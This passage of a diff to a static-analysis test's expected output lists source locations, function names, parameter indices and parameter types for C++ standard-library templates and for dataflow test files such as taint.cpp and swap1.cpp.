bidirectional_iterator_tag && | +| stl.h:69:9:69:9 | operator= | 0 | const bidirectional_iterator_tag & | +| stl.h:70:9:70:9 | operator= | 0 | const random_access_iterator_tag & | +| stl.h:70:9:70:9 | operator= | 0 | random_access_iterator_tag && | +| stl.h:72:9:72:9 | operator= | 0 | const output_iterator_tag & | +| stl.h:72:9:72:9 | operator= | 0 | output_iterator_tag && | | stl.h:86:22:86:41 | back_insert_iterator | 0 | class:0 & | | stl.h:86:22:86:41 | back_insert_iterator | 0 | class:0 & | +| stl.h:86:22:86:41 | back_insert_iterator | 0 | vector, allocator>, allocator, allocator>>> & | +| stl.h:86:22:86:41 | back_insert_iterator | 0 | vector> & | | stl.h:88:25:88:33 | operator= | 0 | value_type && | | stl.h:88:25:88:33 | operator= | 0 | value_type && | | stl.h:91:24:91:33 | operator++ | 0 | int | | stl.h:91:24:91:33 | operator++ | 0 | int | | stl.h:95:44:95:44 | back_inserter | 0 | func:0 & | | stl.h:95:44:95:44 | back_inserter | 0 | func:0 & | +| stl.h:95:44:95:44 | back_inserter | 0 | vector, allocator>, allocator, allocator>>> & | +| stl.h:95:44:95:44 | back_inserter | 0 | vector> & | +| stl.h:147:12:147:23 | basic_string | 0 | const 
allocator & | +| stl.h:148:3:148:14 | basic_string | 0 | const char * | | stl.h:148:3:148:14 | basic_string | 0 | const class:2 & | +| stl.h:148:3:148:14 | basic_string | 1 | const allocator & | | stl.h:149:33:149:44 | basic_string | 0 | const class:0 * | +| stl.h:149:33:149:44 | basic_string | 0 | func:0 | | stl.h:149:33:149:44 | basic_string | 1 | const class:2 & | +| stl.h:149:33:149:44 | basic_string | 1 | func:0 | +| stl.h:149:33:149:44 | basic_string | 2 | const allocator & | | stl.h:151:16:151:20 | c_str | 0 | func:0 | | stl.h:151:16:151:20 | c_str | 1 | func:0 | | stl.h:151:16:151:20 | c_str | 2 | const class:2 & | +| stl.h:165:8:165:16 | push_back | 0 | char | | stl.h:173:13:173:22 | operator[] | 0 | size_type | | stl.h:175:13:175:14 | at | 0 | size_type | +| stl.h:176:35:176:44 | operator+= | 0 | const func:0 & | +| stl.h:176:35:176:44 | operator+= | 0 | const func:0 & | | stl.h:176:35:176:44 | operator+= | 0 | size_type | | stl.h:176:35:176:44 | operator+= | 0 | size_type | +| stl.h:177:17:177:26 | operator+= | 0 | const char * | | stl.h:177:17:177:26 | operator+= | 0 | const func:0 & | +| stl.h:178:17:178:22 | append | 0 | const basic_string, allocator> & | | stl.h:178:17:178:22 | append | 0 | const class:0 * | | stl.h:179:17:179:22 | append | 0 | const basic_string & | +| stl.h:179:17:179:22 | append | 0 | const char * | | stl.h:180:17:180:22 | append | 0 | const class:0 * | +| stl.h:180:17:180:22 | append | 0 | size_type | +| stl.h:180:17:180:22 | append | 1 | char | +| stl.h:181:47:181:52 | append | 0 | func:0 | | stl.h:181:47:181:52 | append | 0 | size_type | | stl.h:181:47:181:52 | append | 1 | class:0 | +| stl.h:181:47:181:52 | append | 1 | func:0 | +| stl.h:182:17:182:22 | assign | 0 | const basic_string, allocator> & | | stl.h:182:17:182:22 | assign | 0 | func:0 | | stl.h:182:17:182:22 | assign | 1 | func:0 | | stl.h:183:17:183:22 | assign | 0 | const basic_string & | +| stl.h:183:17:183:22 | assign | 0 | size_type | +| stl.h:183:17:183:22 | 
assign | 1 | char | +| stl.h:184:47:184:52 | assign | 0 | func:0 | | stl.h:184:47:184:52 | assign | 0 | size_type | | stl.h:184:47:184:52 | assign | 1 | class:0 | +| stl.h:184:47:184:52 | assign | 1 | func:0 | | stl.h:185:17:185:22 | insert | 0 | func:0 | +| stl.h:185:17:185:22 | insert | 0 | size_type | +| stl.h:185:17:185:22 | insert | 1 | const basic_string, allocator> & | | stl.h:185:17:185:22 | insert | 1 | func:0 | | stl.h:186:17:186:22 | insert | 0 | size_type | | stl.h:186:17:186:22 | insert | 1 | const basic_string & | +| stl.h:186:17:186:22 | insert | 1 | size_type | +| stl.h:186:17:186:22 | insert | 2 | char | | stl.h:187:17:187:22 | insert | 0 | size_type | +| stl.h:187:17:187:22 | insert | 1 | const char * | | stl.h:187:17:187:22 | insert | 1 | size_type | | stl.h:187:17:187:22 | insert | 2 | class:0 | +| stl.h:188:12:188:17 | insert | 0 | const_iterator | | stl.h:188:12:188:17 | insert | 0 | size_type | | stl.h:188:12:188:17 | insert | 1 | const class:0 * | +| stl.h:188:12:188:17 | insert | 1 | size_type | +| stl.h:188:12:188:17 | insert | 2 | char | | stl.h:189:42:189:47 | insert | 0 | const_iterator | +| stl.h:189:42:189:47 | insert | 1 | func:0 | | stl.h:189:42:189:47 | insert | 1 | size_type | | stl.h:189:42:189:47 | insert | 2 | class:0 | +| stl.h:189:42:189:47 | insert | 2 | func:0 | | stl.h:190:17:190:23 | replace | 0 | const_iterator | +| stl.h:190:17:190:23 | replace | 0 | size_type | | stl.h:190:17:190:23 | replace | 1 | func:0 | +| stl.h:190:17:190:23 | replace | 1 | size_type | +| stl.h:190:17:190:23 | replace | 2 | const basic_string, allocator> & | | stl.h:190:17:190:23 | replace | 2 | func:0 | | stl.h:191:17:191:23 | replace | 0 | size_type | | stl.h:191:17:191:23 | replace | 1 | size_type | | stl.h:191:17:191:23 | replace | 2 | const basic_string & | +| stl.h:191:17:191:23 | replace | 2 | size_type | +| stl.h:191:17:191:23 | replace | 3 | char | +| stl.h:192:13:192:16 | copy | 0 | char * | | stl.h:192:13:192:16 | copy | 0 | size_type | 
| stl.h:192:13:192:16 | copy | 1 | size_type | | stl.h:192:13:192:16 | copy | 2 | size_type | @@ -463,11 +961,18 @@ getParameterTypeName | stl.h:193:8:193:12 | clear | 0 | class:0 * | | stl.h:193:8:193:12 | clear | 1 | size_type | | stl.h:193:8:193:12 | clear | 2 | size_type | +| stl.h:194:16:194:21 | substr | 0 | size_type | +| stl.h:194:16:194:21 | substr | 1 | size_type | +| stl.h:195:8:195:11 | swap | 0 | basic_string, allocator> & | | stl.h:195:8:195:11 | swap | 0 | size_type | | stl.h:195:8:195:11 | swap | 1 | size_type | | stl.h:198:94:198:102 | operator+ | 0 | const basic_string & | +| stl.h:198:94:198:102 | operator+ | 0 | const basic_string, allocator> & | | stl.h:198:94:198:102 | operator+ | 1 | const basic_string & | +| stl.h:198:94:198:102 | operator+ | 1 | const basic_string, allocator> & | | stl.h:199:94:199:102 | operator+ | 0 | const basic_string & | +| stl.h:199:94:199:102 | operator+ | 0 | const basic_string, allocator> & | +| stl.h:199:94:199:102 | operator+ | 1 | const char * | | stl.h:199:94:199:102 | operator+ | 1 | const func:0 * | | stl.h:214:33:214:42 | operator>> | 0 | int & | | stl.h:217:33:217:35 | get | 0 | char_type & | 
@@ -484,26 +989,49 @@ getParameterTypeName | stl.h:226:32:226:38 | getline | 1 | streamsize | | stl.h:226:32:226:38 | getline | 2 | char_type | | stl.h:229:68:229:77 | operator>> | 0 | basic_istream & | +| stl.h:229:68:229:77 | operator>> | 0 | basic_istream> & | +| stl.h:229:68:229:77 | operator>> | 1 | char * | | stl.h:229:68:229:77 | operator>> | 1 | func:0 * | | stl.h:230:85:230:94 | operator>> | 0 | basic_istream & | +| stl.h:230:85:230:94 | operator>> | 0 | basic_istream> & | | stl.h:230:85:230:94 | operator>> | 1 | basic_string & | +| stl.h:230:85:230:94 | operator>> | 1 | basic_string, allocator> & | | stl.h:232:84:232:90 | getline | 0 | basic_istream & | +| stl.h:232:84:232:90 | getline | 0 | basic_istream> & | | stl.h:232:84:232:90 | getline | 1 | basic_string & | +| stl.h:232:84:232:90 | getline | 1 | basic_string, allocator> & | +| stl.h:232:84:232:90 | getline | 2 | char | | stl.h:232:84:232:90 | getline | 2 | func:0 | | stl.h:233:84:233:90 | getline | 0 | basic_istream & | +| stl.h:233:84:233:90 | getline | 0 | basic_istream> & | | stl.h:233:84:233:90 | getline | 1 | basic_string & | +| stl.h:233:84:233:90 | getline | 1 | basic_string, allocator> & | | stl.h:240:33:240:42 | operator<< | 0 | int | | stl.h:242:33:242:35 | put | 0 | char_type | | stl.h:243:33:243:37 | write | 0 | const char_type * | | stl.h:243:33:243:37 | write | 1 | streamsize | | stl.h:247:67:247:76 | operator<< | 0 | basic_ostream & | +| stl.h:247:67:247:76 | operator<< | 0 | basic_ostream> & | +| stl.h:247:67:247:76 | operator<< | 1 | const char * | | stl.h:247:67:247:76 | operator<< | 1 | const func:0 * | | stl.h:248:85:248:94 | operator<< | 0 | basic_ostream & | +| stl.h:248:85:248:94 | operator<< | 0 | basic_ostream> & | | stl.h:248:85:248:94 | operator<< | 1 | const basic_string & | +| stl.h:248:85:248:94 | operator<< | 1 | const basic_string, allocator> & | | stl.h:259:12:259:29 | basic_stringstream | 0 | const basic_string & | +| stl.h:259:12:259:29 | basic_stringstream | 0 | 
const basic_string, allocator> & | | stl.h:263:23:263:31 | operator= | 0 | basic_stringstream && | +| stl.h:263:23:263:31 | operator= | 0 | basic_stringstream, allocator> && | | stl.h:265:8:265:11 | swap | 0 | basic_stringstream & | +| stl.h:265:8:265:11 | swap | 0 | basic_stringstream, allocator> & | | stl.h:268:8:268:10 | str | 0 | const basic_string & | +| stl.h:268:8:268:10 | str | 0 | const basic_string, allocator> & | +| stl.h:293:12:293:17 | vector | 0 | const allocator & | +| stl.h:293:12:293:17 | vector | 0 | const allocator & | +| stl.h:293:12:293:17 | vector | 0 | const allocator & | +| stl.h:293:12:293:17 | vector | 0 | const allocator & | +| stl.h:293:12:293:17 | vector | 0 | const allocator & | +| stl.h:293:12:293:17 | vector | 0 | const allocator, allocator>> & | | stl.h:293:12:293:17 | vector | 0 | const class:1 & | | stl.h:293:12:293:17 | vector | 0 | const class:1 & | | stl.h:293:12:293:17 | vector | 0 | const class:1 & | @@ -513,6 +1041,9 @@ getParameterTypeName | stl.h:294:12:294:17 | vector | 0 | size_type | | stl.h:294:12:294:17 | vector | 0 | size_type | | stl.h:294:12:294:17 | vector | 0 | size_type | +| stl.h:294:12:294:17 | vector | 1 | const allocator & | +| stl.h:294:12:294:17 | vector | 1 | const allocator & | +| stl.h:294:12:294:17 | vector | 1 | const allocator>> & | | stl.h:294:12:294:17 | vector | 1 | const class:1 & | | stl.h:294:12:294:17 | vector | 1 | const class:1 & | | stl.h:294:12:294:17 | vector | 1 | const class:1 & | 
@@ -520,13 +1051,20 @@ getParameterTypeName | stl.h:295:3:295:8 | vector | 0 | size_type | | stl.h:295:3:295:8 | vector | 1 | const class:0 & | | stl.h:295:3:295:8 | vector | 1 | const class:0 & | +| stl.h:295:3:295:8 | vector | 1 | const int & | +| stl.h:295:3:295:8 | vector | 1 | const short & | +| stl.h:295:3:295:8 | vector | 2 | const allocator & | +| stl.h:295:3:295:8 | vector | 2 | const allocator & | | stl.h:295:3:295:8 | vector | 2 | const class:1 & | | stl.h:295:3:295:8 | vector | 2 | const class:1 & | | stl.h:296:101:296:106 | vector | 0 | func:0 | | stl.h:296:101:296:106 | vector | 1 | func:0 | +| stl.h:296:101:296:106 | vector | 2 | const allocator & | | stl.h:296:101:296:106 | vector | 2 | const class:1 & | | stl.h:301:11:301:19 | operator= | 0 | const vector & | +| stl.h:301:11:301:19 | operator= | 0 | const vector> & | | stl.h:302:11:302:19 | operator= | 0 | vector && | +| stl.h:302:11:302:19 | operator= | 0 | vector> && | | stl.h:303:106:303:111 | assign | 0 | func:0 | | stl.h:303:106:303:111 | assign | 1 | func:0 | | stl.h:306:8:306:13 | assign | 0 | size_type | @@ -535,6 +1073,9 @@ getParameterTypeName | stl.h:306:8:306:13 | assign | 1 | const class:0 & | | stl.h:306:8:306:13 | assign | 1 | const class:0 & | | stl.h:306:8:306:13 | assign | 1 | const class:0 & | +| stl.h:306:8:306:13 | assign | 1 | const float & | +| stl.h:306:8:306:13 | assign | 1 | const int & | +| stl.h:306:8:306:13 | assign | 1 | const int *const & | | stl.h:315:13:315:22 | operator[] | 0 | size_type | | stl.h:315:13:315:22 | operator[] | 0 | size_type | | stl.h:315:13:315:22 | operator[] | 0 | size_type | 
@@ -542,11 +1083,15 @@ getParameterTypeName | stl.h:315:13:315:22 | operator[] | 0 | size_type | | stl.h:315:13:315:22 | operator[] | 0 | size_type | | stl.h:318:13:318:14 | at | 0 | size_type | +| stl.h:327:8:327:16 | push_back | 0 | const MyPair & | +| stl.h:327:8:327:16 | push_back | 0 | const MyVectorContainer & | | stl.h:327:8:327:16 | push_back | 0 | const class:0 & | | stl.h:327:8:327:16 | push_back | 0 | const class:0 & | | stl.h:328:8:328:16 | push_back | 0 | class:0 && | +| stl.h:328:8:328:16 | push_back | 0 | int && | | stl.h:331:12:331:17 | insert | 0 | const_iterator | | stl.h:331:12:331:17 | insert | 1 | class:0 && | +| stl.h:331:12:331:17 | insert | 1 | int && | | stl.h:333:42:333:47 | insert | 0 | const_iterator | | stl.h:333:42:333:47 | insert | 0 | const_iterator | | stl.h:333:42:333:47 | insert | 1 | func:0 | 
@@ -557,21 +1102,38 @@ getParameterTypeName | stl.h:335:37:335:43 | emplace | 1 | func:0 && | | stl.h:336:33:336:44 | emplace_back | 0 | func:0 && | | stl.h:338:8:338:11 | swap | 0 | vector & | +| stl.h:338:8:338:11 | swap | 0 | vector> & | | stl.h:351:12:351:21 | shared_ptr | 0 | class:0 * | +| stl.h:351:12:351:21 | shared_ptr | 0 | int * | | stl.h:352:3:352:12 | shared_ptr | 0 | const shared_ptr & | | stl.h:352:3:352:12 | shared_ptr | 0 | const shared_ptr & | +| stl.h:369:12:369:21 | unique_ptr | 0 | A * | | stl.h:369:12:369:21 | unique_ptr | 0 | class:0 * | | stl.h:380:52:380:62 | make_unique | 0 | func:1 && | | stl.h:380:52:380:62 | make_unique | 0 | func:1 && | | stl.h:380:52:380:62 | make_unique | 0 | func:1 && | +| stl.h:380:52:380:62 | make_unique | 0 | int && | +| stl.h:380:52:380:62 | make_unique | 0 | int && | | stl.h:382:52:382:62 | make_shared | 0 | func:1 && | | stl.h:382:52:382:62 | make_shared | 0 | func:1 && | | stl.h:382:52:382:62 | make_shared | 0 | func:1 && | +| stl.h:382:52:382:62 | make_shared | 0 | int && | +| stl.h:382:52:382:62 | make_shared | 0 | int && | +| stl.h:396:3:396:3 | pair | 0 | char *const & | +| stl.h:396:3:396:3 | pair | 0 | char *const & | +| stl.h:396:3:396:3 | pair | 0 | const char *const & | +| stl.h:396:3:396:3 | pair | 0 | const char *const & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | +| stl.h:396:3:396:3 | pair | 0 | const pair & | +| stl.h:396:3:396:3 | pair | 1 | char *const & | +| stl.h:396:3:396:3 | pair | 1 | char *const & | +| stl.h:396:3:396:3 | pair | 1 | const char *const & | +| stl.h:396:3:396:3 | pair | 1 | const char *const & | +| stl.h:396:3:396:3 | pair | 1 | const char *const & | | stl.h:396:3:396:3 | pair | 1 | const class:1 & | | stl.h:396:3:396:3 | pair | 1 | const class:1 & | | 
stl.h:396:3:396:3 | pair | 1 | const class:1 & | @@ -590,12 +1152,24 @@ getParameterTypeName | stl.h:397:30:397:33 | pair | 0 | const pair & | | stl.h:397:30:397:33 | pair | 0 | const pair & | | stl.h:399:8:399:11 | swap | 0 | pair & | +| stl.h:402:72:402:72 | make_pair | 0 | char *&& | +| stl.h:402:72:402:72 | make_pair | 0 | const char(&)[2] | +| stl.h:402:72:402:72 | make_pair | 0 | const char(&)[2] | +| stl.h:402:72:402:72 | make_pair | 0 | const char(&)[4] | +| stl.h:402:72:402:72 | make_pair | 0 | const char(&)[4] | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | +| stl.h:402:72:402:72 | make_pair | 0 | pair && | +| stl.h:402:72:402:72 | make_pair | 1 | char *&& | +| stl.h:402:72:402:72 | make_pair | 1 | char *&& | +| stl.h:402:72:402:72 | make_pair | 1 | const char(&)[2] | +| stl.h:402:72:402:72 | make_pair | 1 | const char(&)[4] | +| stl.h:402:72:402:72 | make_pair | 1 | const char(&)[4] | +| stl.h:402:72:402:72 | make_pair | 1 | const char(&)[4] | | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | @@ -603,7 +1177,9 @@ getParameterTypeName | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | | stl.h:422:3:422:5 | map | 0 | const map & | +| stl.h:422:3:422:5 | map | 0 | const map, allocator>> & | | stl.h:426:8:426:16 | operator= | 0 | const map & | +| stl.h:426:8:426:16 | operator= | 0 | const map, allocator>> & | | stl.h:435:6:435:15 | operator[] | 0 | key_type && | | stl.h:435:6:435:15 | operator[] | 0 | key_type && | | stl.h:436:6:436:7 | at | 0 | const key_type & | 
@@ -633,14 +1209,19 @@ getParameterTypeName | stl.h:454:30:454:45 | insert_or_assign | 2 | func:0 && | | stl.h:456:12:456:16 | erase | 0 | iterator | | stl.h:459:8:459:11 | swap | 0 | map & | +| stl.h:459:8:459:11 | swap | 0 | map, allocator>> & | | stl.h:462:27:462:31 | merge | 0 | map & | +| stl.h:462:27:462:31 | merge | 0 | map>> & | | stl.h:465:12:465:15 | find | 0 | const key_type & | | stl.h:468:12:468:22 | lower_bound | 0 | const key_type & | | stl.h:470:12:470:22 | upper_bound | 0 | const key_type & | | stl.h:473:28:473:38 | equal_range | 0 | const key_type & | | stl.h:490:3:490:15 | unordered_map | 0 | const unordered_map & | | stl.h:490:3:490:15 | unordered_map | 0 | const unordered_map & | +| stl.h:490:3:490:15 | unordered_map | 0 | const unordered_map, equal_to, allocator>> & | +| stl.h:490:3:490:15 | unordered_map | 0 | const unordered_map, hash, equal_to, allocator>>> & | | stl.h:494:18:494:26 | operator= | 0 | const unordered_map & | +| stl.h:494:18:494:26 | operator= | 0 | const unordered_map, equal_to, allocator>> & | | stl.h:503:16:503:25 | operator[] | 0 | key_type && | | stl.h:503:16:503:25 | operator[] | 0 | key_type && | | stl.h:504:16:504:17 | at | 0 | const key_type & | 
@@ -679,13 +1260,17 @@ getParameterTypeName | stl.h:522:30:522:45 | insert_or_assign | 2 | func:0 && | | stl.h:524:12:524:16 | erase | 0 | iterator | | stl.h:527:8:527:11 | swap | 0 | unordered_map & | +| stl.h:527:8:527:11 | swap | 0 | unordered_map, equal_to, allocator>> & | | stl.h:530:37:530:41 | merge | 0 | unordered_map & | +| stl.h:530:37:530:41 | merge | 0 | unordered_map>> & | | stl.h:533:12:533:15 | find | 0 | const key_type & | | stl.h:536:28:536:38 | equal_range | 0 | const key_type & | | stl.h:555:3:555:5 | set | 0 | const set & | +| stl.h:555:3:555:5 | set | 0 | const set, allocator> & | | stl.h:557:33:557:35 | set | 0 | func:0 | | stl.h:557:33:557:35 | set | 1 | func:0 | | stl.h:560:8:560:16 | operator= | 0 | const set & | +| stl.h:560:8:560:16 | operator= | 0 | const set, allocator> & | | stl.h:568:48:568:54 | emplace | 0 | func:0 && | | stl.h:568:48:568:54 | emplace | 0 | func:0 && | | stl.h:569:36:569:47 | emplace_hint | 0 | const_iterator | 
@@ -699,16 +1284,20 @@ getParameterTypeName | stl.h:574:38:574:43 | insert | 1 | func:0 | | stl.h:576:12:576:16 | erase | 0 | iterator | | stl.h:579:8:579:11 | swap | 0 | set & | +| stl.h:579:8:579:11 | swap | 0 | set, allocator> & | | stl.h:582:27:582:31 | merge | 0 | set & | +| stl.h:582:27:582:31 | merge | 0 | set> & | | stl.h:585:12:585:15 | find | 0 | const key_type & | | stl.h:588:12:588:22 | lower_bound | 0 | const key_type & | | stl.h:590:12:590:22 | upper_bound | 0 | const key_type & | | stl.h:592:28:592:38 | equal_range | 0 | const key_type & | | stl.h:609:3:609:15 | unordered_set | 0 | const unordered_set & | +| stl.h:609:3:609:15 | unordered_set | 0 | const unordered_set, equal_to, allocator> & | | stl.h:611:33:611:45 | unordered_set | 0 | func:0 | | stl.h:611:33:611:45 | unordered_set | 1 | func:0 | | stl.h:611:33:611:45 | unordered_set | 2 | size_type | | stl.h:614:18:614:26 | operator= | 0 | const unordered_set & | +| stl.h:614:18:614:26 | operator= | 0 | const unordered_set, equal_to, allocator> & | | stl.h:622:48:622:54 | emplace | 0 | func:0 && | | stl.h:622:48:622:54 | emplace | 0 | func:0 && | | stl.h:623:36:623:47 | emplace_hint | 0 | const_iterator | 
@@ -722,23 +1311,282 @@ getParameterTypeName | stl.h:628:38:628:43 | insert | 1 | func:0 | | stl.h:630:12:630:16 | erase | 0 | iterator | | stl.h:633:8:633:11 | swap | 0 | unordered_set & | +| stl.h:633:8:633:11 | swap | 0 | unordered_set, equal_to, allocator> & | | stl.h:636:37:636:41 | merge | 0 | unordered_set & | +| stl.h:636:37:636:41 | merge | 0 | unordered_set> & | | stl.h:639:12:639:15 | find | 0 | const key_type & | | stl.h:641:28:641:38 | equal_range | 0 | const key_type & | | stl.h:671:21:671:39 | basic_format_string | 0 | const func:0 & | | stl.h:671:21:671:39 | basic_format_string | 0 | const func:0 & | | stl.h:678:33:678:38 | format | 0 | format_string | | stl.h:678:33:678:38 | format | 0 | format_string | +| stl.h:678:33:678:38 | format | 1 | char *&& | | stl.h:678:33:678:38 | format | 1 | func:0 && | | stl.h:678:33:678:38 | format | 1 | func:0 && | | stl.h:683:6:683:48 | same_signature_as_format_but_different_name | 0 | format_string | | stl.h:683:6:683:48 | same_signature_as_format_but_different_name | 1 | func:0 && | +| stl.h:683:6:683:48 | same_signature_as_format_but_different_name | 1 | int & | +| string.cpp:17:6:17:9 | sink | 0 | const char * | +| string.cpp:18:6:18:9 | sink | 0 | const string & | +| string.cpp:19:6:19:9 | sink | 0 | const char * | +| string.cpp:19:6:19:9 | sink | 1 | const char * | +| string.cpp:20:6:20:9 | sink | 0 | char | +| string.cpp:21:6:21:9 | sink | 0 | iterator | +| stringstream.cpp:13:6:13:9 | sink | 0 | int | +| stringstream.cpp:15:6:15:9 | sink | 0 | const string & | | stringstream.cpp:18:6:18:9 | sink | 0 | const basic_ostream> & | | stringstream.cpp:21:6:21:9 | sink | 0 | const basic_istream> & | | stringstream.cpp:24:6:24:9 | sink | 0 | const basic_iostream> & | +| stringstream.cpp:26:6:26:29 | test_stringstream_string | 0 | int | +| stringstream.cpp:70:6:70:26 | test_stringstream_int | 0 | int | +| structlikeclass.cpp:5:7:5:7 | StructLikeClass | 0 | StructLikeClass && | +| structlikeclass.cpp:5:7:5:7 | 
StructLikeClass | 0 | const StructLikeClass & | +| structlikeclass.cpp:5:7:5:7 | operator= | 0 | StructLikeClass && | +| structlikeclass.cpp:5:7:5:7 | operator= | 0 | const StructLikeClass & | +| structlikeclass.cpp:8:2:8:16 | StructLikeClass | 0 | int | +| swap1.cpp:14:9:14:9 | move | 0 | Class & | | swap1.cpp:14:9:14:9 | move | 0 | func:0 & | +| swap1.cpp:24:9:24:13 | Class | 0 | Class && | +| swap1.cpp:25:9:25:13 | Class | 0 | const Class & | +| swap1.cpp:27:16:27:24 | operator= | 0 | const Class & | +| swap1.cpp:34:16:34:24 | operator= | 0 | Class && | +| swap1.cpp:40:16:40:26 | copy_assign | 0 | const Class & | +| swap1.cpp:47:16:47:26 | move_assign | 0 | Class && | +| swap1.cpp:53:14:53:17 | swap | 0 | Class & | +| swap1.cpp:61:10:61:13 | swap | 0 | Class & | +| swap1.cpp:61:10:61:13 | swap | 1 | Class & | +| swap2.cpp:14:9:14:9 | move | 0 | Class & | | swap2.cpp:14:9:14:9 | move | 0 | func:0 & | +| swap2.cpp:24:9:24:13 | Class | 0 | Class && | +| swap2.cpp:25:9:25:13 | Class | 0 | const Class & | +| swap2.cpp:27:16:27:24 | operator= | 0 | const Class & | +| swap2.cpp:34:16:34:24 | operator= | 0 | Class && | +| swap2.cpp:40:16:40:26 | copy_assign | 0 | const Class & | +| swap2.cpp:47:16:47:26 | move_assign | 0 | Class && | +| swap2.cpp:53:14:53:17 | swap | 0 | Class & | +| swap2.cpp:61:10:61:13 | swap | 0 | Class & | +| swap2.cpp:61:10:61:13 | swap | 1 | Class & | | swap.h:4:20:4:23 | swap | 0 | func:0 & | +| swap.h:4:20:4:23 | swap | 0 | int & | | swap.h:4:20:4:23 | swap | 1 | func:0 & | +| swap.h:4:20:4:23 | swap | 1 | int & | +| taint.cpp:4:6:4:21 | arithAssignments | 0 | int | +| taint.cpp:4:6:4:21 | arithAssignments | 1 | int | +| taint.cpp:22:5:22:13 | increment | 0 | int | +| taint.cpp:23:5:23:8 | zero | 0 | int | +| taint.cpp:69:7:69:7 | MyClass | 0 | MyClass && | +| taint.cpp:69:7:69:7 | MyClass | 0 | const MyClass & | +| taint.cpp:69:7:69:7 | operator= | 0 | MyClass && | +| taint.cpp:69:7:69:7 | operator= | 0 | const MyClass & | +| 
taint.cpp:100:6:100:15 | array_test | 0 | int | +| taint.cpp:142:5:142:10 | select | 0 | int | +| taint.cpp:142:5:142:10 | select | 1 | int | +| taint.cpp:142:5:142:10 | select | 2 | int | +| taint.cpp:150:6:150:12 | fn_test | 0 | int | +| taint.cpp:156:7:156:12 | strcpy | 0 | char * | +| taint.cpp:156:7:156:12 | strcpy | 1 | const char * | +| taint.cpp:157:7:157:12 | strcat | 0 | char * | +| taint.cpp:157:7:157:12 | strcat | 1 | const char * | +| taint.cpp:180:7:180:12 | callee | 0 | int * | +| taint.cpp:190:7:190:12 | memcpy | 0 | void * | +| taint.cpp:190:7:190:12 | memcpy | 1 | void * | +| taint.cpp:190:7:190:12 | memcpy | 2 | int | +| taint.cpp:192:6:192:16 | test_memcpy | 0 | int * | +| taint.cpp:228:11:228:11 | (unnamed constructor) | 0 | const lambda [] type at line 233, col. 11 & | +| taint.cpp:228:11:228:11 | (unnamed constructor) | 0 | lambda [] type at line 233, col. 11 && | +| taint.cpp:228:11:228:11 | operator= | 0 | const lambda [] type at line 233, col. 11 & | +| taint.cpp:235:11:235:11 | (unnamed constructor) | 0 | const lambda [] type at line 240, col. 11 & | +| taint.cpp:235:11:235:11 | (unnamed constructor) | 0 | lambda [] type at line 240, col. 11 && | +| taint.cpp:235:11:235:11 | operator= | 0 | const lambda [] type at line 240, col. 11 & | +| taint.cpp:243:11:243:11 | (unnamed constructor) | 0 | const lambda [] type at line 248, col. 11 & | +| taint.cpp:243:11:243:11 | (unnamed constructor) | 0 | lambda [] type at line 248, col. 11 && | +| taint.cpp:243:11:243:11 | operator= | 0 | const lambda [] type at line 248, col. 11 & | +| taint.cpp:249:11:249:11 | (unnamed constructor) | 0 | const lambda [] type at line 254, col. 11 & | +| taint.cpp:249:11:249:11 | (unnamed constructor) | 0 | lambda [] type at line 254, col. 11 && | +| taint.cpp:249:11:249:11 | operator= | 0 | const lambda [] type at line 254, col. 
11 & | +| taint.cpp:249:13:249:13 | _FUN | 0 | int | +| taint.cpp:249:13:249:13 | _FUN | 1 | int | +| taint.cpp:249:13:249:13 | operator() | 0 | int | +| taint.cpp:249:13:249:13 | operator() | 1 | int | +| taint.cpp:255:11:255:11 | (unnamed constructor) | 0 | const lambda [] type at line 260, col. 11 & | +| taint.cpp:255:11:255:11 | (unnamed constructor) | 0 | lambda [] type at line 260, col. 11 && | +| taint.cpp:255:11:255:11 | operator= | 0 | const lambda [] type at line 260, col. 11 & | +| taint.cpp:255:13:255:13 | _FUN | 0 | int & | +| taint.cpp:255:13:255:13 | _FUN | 1 | int & | +| taint.cpp:255:13:255:13 | _FUN | 2 | int & | +| taint.cpp:255:13:255:13 | operator() | 0 | int & | +| taint.cpp:255:13:255:13 | operator() | 1 | int & | +| taint.cpp:255:13:255:13 | operator() | 2 | int & | +| taint.cpp:266:5:266:6 | id | 0 | int | +| taint.cpp:297:6:297:14 | myAssign1 | 0 | int & | +| taint.cpp:297:6:297:14 | myAssign1 | 1 | int & | +| taint.cpp:302:6:302:14 | myAssign2 | 0 | int & | +| taint.cpp:302:6:302:14 | myAssign2 | 1 | int | +| taint.cpp:307:6:307:14 | myAssign3 | 0 | int * | +| taint.cpp:307:6:307:14 | myAssign3 | 1 | int | +| taint.cpp:312:6:312:14 | myAssign4 | 0 | int * | +| taint.cpp:312:6:312:14 | myAssign4 | 1 | int | +| taint.cpp:320:6:320:16 | myNotAssign | 0 | int & | +| taint.cpp:320:6:320:16 | myNotAssign | 1 | int & | +| taint.cpp:361:7:361:12 | strdup | 0 | const char * | +| taint.cpp:362:7:362:13 | strndup | 0 | const char * | +| taint.cpp:362:7:362:13 | strndup | 1 | size_t | +| taint.cpp:363:10:363:15 | wcsdup | 0 | const wchar_t * | +| taint.cpp:364:7:364:13 | strdupa | 0 | const char * | +| taint.cpp:365:7:365:14 | strndupa | 0 | const char * | +| taint.cpp:365:7:365:14 | strndupa | 1 | size_t | +| taint.cpp:367:6:367:16 | test_strdup | 0 | char * | +| taint.cpp:379:6:379:17 | test_strndup | 0 | int | +| taint.cpp:387:6:387:16 | test_wcsdup | 0 | wchar_t * | +| taint.cpp:397:6:397:17 | test_strdupa | 0 | char * | +| taint.cpp:409:6:409:18 
